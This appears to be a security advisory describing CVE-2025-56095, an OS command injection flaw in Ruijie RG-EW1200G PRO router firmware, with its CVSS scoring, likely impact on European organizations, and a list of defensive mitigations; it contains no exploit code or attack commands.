CVE-2025-56095 is an OS command injection vulnerability identified in Ruijie RG-EW1200G PRO devices, spanning firmware versions V1.00 through V4.00. The vulnerability resides in the handling of POST requests to the module_set function within the /usr/local/lua/dev_sta/nbr_cwmp.lua script. Specifically, the device fails to properly sanitize input parameters, allowing an attacker with low privileges to inject arbitrary operating system commands. This flaw is exploitable remotely over the network without requiring user interaction, making it a critical risk for exposed devices. The CVSS 3.1 base score is 8.8, reflecting high impact on confidentiality, integrity, and availability, with an attack vector of network (AV:N), low attack complexity (AC:L), requiring privileges (PR:L), no user interaction (UI:N), and unchanged scope (S:U). Although no public exploits have been reported yet, the vulnerability’s characteristics suggest that exploitation could lead to full device compromise, enabling attackers to execute arbitrary commands, potentially pivot within networks, exfiltrate sensitive data, or disrupt services. The vulnerability is categorized under CWE-78 (Improper Neutralization of Special Elements used in an OS Command), a common and dangerous class of injection flaws. No patches or mitigation updates have been published at the time of disclosure, increasing the urgency for defensive measures. Ruijie RG-EW1200G PRO devices are commonly deployed in enterprise and service provider environments, making this vulnerability a significant concern for network security.

For European organizations, the impact of CVE-2025-56095 is substantial. The affected Ruijie RG-EW1200G PRO devices are often used in enterprise networks and critical infrastructure, including telecommunications and managed service providers. Exploitation can lead to unauthorized command execution, resulting in data breaches, network disruption, and potential lateral movement within corporate environments. This could compromise sensitive customer data, intellectual property, and operational continuity. Given the high CVSS score and the ability to execute arbitrary commands remotely, attackers could deploy malware, create persistent backdoors, or disrupt network services. The lack of available patches increases the risk window, especially for organizations with exposed management interfaces. European entities with regulatory obligations under GDPR and NIS Directive face additional compliance risks if this vulnerability is exploited. The operational impact could extend to service outages and reputational damage, particularly in sectors such as finance, healthcare, and government where Ruijie devices may be deployed.

1. Immediately restrict network access to the management interfaces of Ruijie RG-EW1200G PRO devices, ensuring they are not exposed to untrusted networks or the internet. 2. Implement strict firewall rules and network segmentation to isolate these devices from critical network segments. 3. Monitor network traffic for anomalous POST requests targeting the module_set endpoint or unusual command execution patterns. 4. Enforce strong authentication and limit administrative privileges to reduce the risk of low-privilege exploitation. 5. Engage with Ruijie support channels to obtain official patches or firmware updates as soon as they become available and prioritize their deployment. 6. Conduct regular vulnerability scans and penetration tests focusing on these devices to detect potential exploitation attempts. 7. Maintain comprehensive logging and alerting on device management activities to enable rapid incident response. 8. Consider deploying intrusion prevention systems (IPS) with signatures targeting this specific vulnerability once available. 9. Educate network administrators about this vulnerability and the importance of secure device configuration. 10. As a temporary measure, if feasible, disable or restrict the vulnerable module_set functionality until a patch is applied.